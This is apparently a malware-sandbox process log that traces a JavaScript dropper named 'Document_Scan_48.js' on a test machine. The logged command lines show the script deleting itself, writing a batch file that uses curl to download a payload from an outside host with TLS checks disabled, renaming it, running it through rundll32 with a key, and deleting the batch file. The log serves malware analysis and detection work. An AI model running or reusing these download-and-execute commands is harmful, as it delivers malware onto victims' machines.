wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Document_Scan_48.js
2568cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_48.js"
2660cmd.exe "C:\Windows\System32\cmd.exe" /c echo curl https://moashraya.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\dignissimos.iharum.m" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\dignissimos.i.bat"
2716cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\dignissimos.i.bat"
2796curl.exe curl https://moashraya.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\dignissimos.iharum.m" --ssl-no-revoke --insecure --location
2884cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\dignissimos.iharum.m" "dignissimos.i"
2960rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\dignissimos.i", scab /k arabika752
3028rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\dignissimos.i", scab /k arabika752
1404cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\dignissimos.i.bat"
3068